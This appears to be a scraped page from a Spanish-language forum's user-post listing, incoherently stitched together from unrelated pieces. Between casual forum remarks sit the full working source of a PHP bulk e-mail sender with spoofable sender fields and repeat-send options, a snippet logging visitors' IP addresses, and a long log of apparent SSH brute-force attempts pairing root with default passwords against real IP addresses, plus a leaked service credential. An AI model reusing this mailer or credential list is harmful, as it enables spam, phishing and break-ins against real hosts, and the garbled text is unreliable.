Llego tarde para escuchar la canción? Qué pena por los comentarios parecía buena.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menú<html>
<head>
<title>E-mail sender</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<style type="text/css">
<!--
body {
background: #333333 url(http://hfmaxcdn.witza.netdna-cdn.com/images/blackreign/bg.png);
color: #ccc;
text-align: center;
line-height: 1.4;
font-family: Verdana, Arial, Sans-Serif;
font-size: 13px;
font-style: none;
}
input {
background-color: #000;
border-color: #F60;
color: #F60;
border-style:dashed;
border:dashed;
border-width:thin;
}
textarea {
background-color: #000;
border-color: #F60;
color: #F60;
border-style:dashed;
border:dashed;
border-width:thin;
}
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
.style2 {
font-size: 10px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
.Times-New-Roman-16px00468Cb {font:bold 16px Times New Roman, serif; color:#00468C}
.Times-New-Roman-24px00468Cb {font:bold 24px Times New Roman, serif; color:#000000}
.Times-New-Roman-32px00468Cb {font:bold 32px Times New Roman, serif; color:#000000}
.style3 {color: #000000}
.style5 {
color: #000000;
font-size: 24px;
}
.style6 {color: #FF0000}
.style7 {font-size: 24px}
-->
</style>
</head>
<body bgcolor="#FFFFFF" text="#000000">
<center>
<p><img src="http://www.phcastillalamancha.es/imagenes/email02.gif"></p>
<p>
</p>
<form name="form1" method="post" action="send.php" enctype="multipart/form-data"><br />
<table width="142" border="0">
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your e-mail:</font>
</div>
</td>
<td width="219">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="from" value="<?php print $from; ?>" size="30" />
</font>
</td>
<td width="212">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your name:</font>
</div>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="<?php print $realname; ?>" size="30" />
</font>
</td>
</tr>
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-to:</font>
</div>
</td>
<td width="219">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="replyto" value="<?php print $replyto; ?>" size="30" />
</font>
</td>
<td width="212">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach file:</font>
</div>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" name="file" size="27" />
</font>
</td>
</tr>
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font>
</div>
</td>
<td colspan="3" width="703">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="subject" value="<? print $subject; ?>" size="90" />
</font>
</td>
</tr>
<tr valign="top">
<td colspan="3" width="520">
<font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Message box:</font>
</td>
<td width="278">
<font face="Verdana, Arial, Helvetica, sans-serif" size="-3">E-mail list (1 per line):</font>
</td>
</tr>
<tr valign="top">
<td colspan="3" width="520">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="message" cols="56" rows="10"><?php print $message; ?></textarea><br />
<input type="radio" name="contenttype" value="plain" checked="checked" /> Plain
<input type="radio" name="contenttype" value="html" /> HTML
<input type="hidden" name="action" value="send" /><br />
Number to send: <input type="text" name="amount" value="1" size="10" /><br />
Maximum script execution time (in seconds, 0 for no timelimit)<input type="text" name="timelimit" value="0" size="10" />
<input type="submit" value="Send e-mails" />
</font>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="emaillist" cols="32" rows="10"><?php print $emaillist; ?></textarea>
</font>
</td>
</tr>
</table>
</form>
</center>
</body>
</html>
<?php
error_reporting(0);
@$action=$_POST['action'];
@$from=$_POST['from'];
@$realname=$_POST['realname'];
@$replyto=$_POST['replyto'];
@$subject=$_POST['subject'];
@$message=$_POST['message'];
@$emaillist=$_POST['emaillist'];
@$file_name=$_FILES['file']['name'];
@$contenttype=$_POST['contenttype'];
@$file=$_FILES['file']['tmp_name'];
@$amount=$_POST['amount'];
set_time_limit(intval($_POST['timelimit']));
if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
If ($file_name){
if (!file_exists($file)){
die("The file you are trying to upload couldn't be copied to the server.");
}
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($xx=0; $xx<$amount; $xx++){
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending e-mail to $to.......";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "ok<br>";
flush();
}
}
}
print '<a href="index.php" target="_self"><< Back</a>';
}
?>
<link rel="stylesheet" href="estilo.css" type="text/css" />
<?php
$ip=@$REMOTE_ADDR;
$ip=$_SERVER['REMOTE_ADDR'];
$fp = fopen("ip.txt", "w") or die("No se ha podido crear el archivo");
$scrie = fwrite($fp, $ip);
fclose($fp);
?>
Nologin: dovecot:dovecot:79.142.64.220
79.142.64.220
dovecot
dovecot
root root 213.5.66.182 | no host
root root 213.5.67.217 | no host
root root 213.5.68.84 | no host
root root 213.5.71.204 | no host
root root 213.5.64.163 | no host
root root 213.5.71.196 | no host
root root 213.5.68.194 | no host
root root 213.5.69.25 | no host
root root 213.5.71.206 | no host
root root 213.5.64.160 | no host
root root123 213.5.67.217 | no host
root root123 213.5.66.182 | no host
root root123 213.5.68.84 | no host
root root123 213.5.71.204 | no host
root root123 213.5.71.196 | no host
root root123 213.5.64.163 | no host
root root123 213.5.64.160 | no host
root root123 213.5.68.194 | no host
root root123 213.5.71.206 | no host
root root123 213.5.69.25 | no host
root root123456 213.5.67.217 | no host
root root123456 213.5.66.182 | no host
root root123456 213.5.71.204 | no host
root root123456 213.5.68.84 | no host
root root123456 213.5.71.196 | no host
root root123456 213.5.64.160 | no host
root root123456 213.5.64.163 | no host
root root123456 213.5.68.194 | no host
root root123456 213.5.71.206 | no host
root root123456 213.5.69.25 | no host
root admin 213.5.68.84 | no host
root admin 213.5.67.217 | no host
root admin 213.5.71.204 | no host
root admin 213.5.66.182 | no host
root admin 213.5.64.160 | no host
root admin 213.5.71.196 | no host
root admin 213.5.68.194 | no host
root admin 213.5.64.163 | no host
root admin 213.5.71.206 | no host
root admin 213.5.69.25 | no host
root admin1 213.5.71.204 | no host
root admin1 213.5.68.84 | no host
root admin1 213.5.67.217 | no host
root admin1 213.5.64.160 | no host
root admin1 213.5.71.196 | no host
root admin1 213.5.66.182 | no host
root admin1 213.5.68.194 | no host
root admin1 213.5.64.163 | no host
root admin1 213.5.71.206 | no host
root admin1 213.5.69.25 | no host
root administrator 213.5.71.204 | no host
root administrator 213.5.68.84 | no host
root administrator 213.5.67.217 | no host
root administrator 213.5.64.160 | no host
root administrator 213.5.66.182 | no host
root administrator 213.5.64.163 | no host
root administrator 213.5.71.206 | no host
root administrator 213.5.69.25 | no host
root admin123 213.5.71.204 | no host
root admin123 213.5.68.84 | no host
root admin123 213.5.67.217 | no host
root admin123 213.5.64.160 | no host
root 123456 213.5.68.84 | no host
root root 213.154.231.164 | no host
root root 213.195.74.40 | no host
root root 213.195.74.39 | no host
root root 213.195.74.43 | no host
root root123 213.195.74.40 | no host
root root 213.203.245.7 | no host
root root123 213.195.74.43 | no host
root root123456 213.195.74.40 | no host
root root 213.208.129.165 | no host
root root123456 213.195.74.43 | no host
root root 213.209.114.96 | no host
root admin 213.195.74.40 | no host
root root 213.208.129.164 | no host
root root123 213.203.245.7 | no host
root root123 213.208.129.165 | no host
root root123 213.209.114.96 | no host
root admin 213.195.74.43 | no host
root admin1 213.195.74.40 | no host
root root123456 213.203.245.7 | no host
root root123456 213.209.114.96 | no host
root root123 213.208.129.164 | no host
root root123456 213.208.129.165 | no host
root administrator 213.195.74.40 | no host
root admin1 213.195.74.43 | no host
root admin 213.203.245.7 | no host
root admin 213.209.114.96 | no host
root admin 213.208.129.165 | no host
root admin123 213.195.74.40 | no host
root root123456 213.208.129.164 | no host
root administrator 213.195.74.43 | no host
root admin1 213.209.114.96 | no host
root admin1 213.203.245.7 | no host
root admin1 213.208.129.165 | no host
root 123456 213.195.74.40 | no host
root admin123 213.195.74.43 | no host
root administrator 213.209.114.96 | no host
root admin 213.208.129.164 | no host
root administrator 213.208.129.165 | no host
root administrator 213.203.245.7 | no host
root password 213.195.74.40 | no host
root admin123 213.209.114.96 | no host
root 123456 213.195.74.43 | no host
root admin1 213.208.129.164 | no host
root admin123 213.208.129.165 | no host
root passw0rd 213.195.74.40 | no host
root admin123 213.203.245.7 | no host
root 123456 213.208.129.165 | no host
Cita de: ANTRUCK en 13 Agosto 2011, 15:58 PM
Ami igual que tu nunca me apeteció a ir a la escuela, solo una diferencia en que tu si va y yo no voy pues yo no hago nada en el mundo que ami no me gusta, y no tengo que estudiar para dinero ganar
Por cierto piber en ninguna parte dice que creo en zombies te falla la vista yo dije creo en la brujería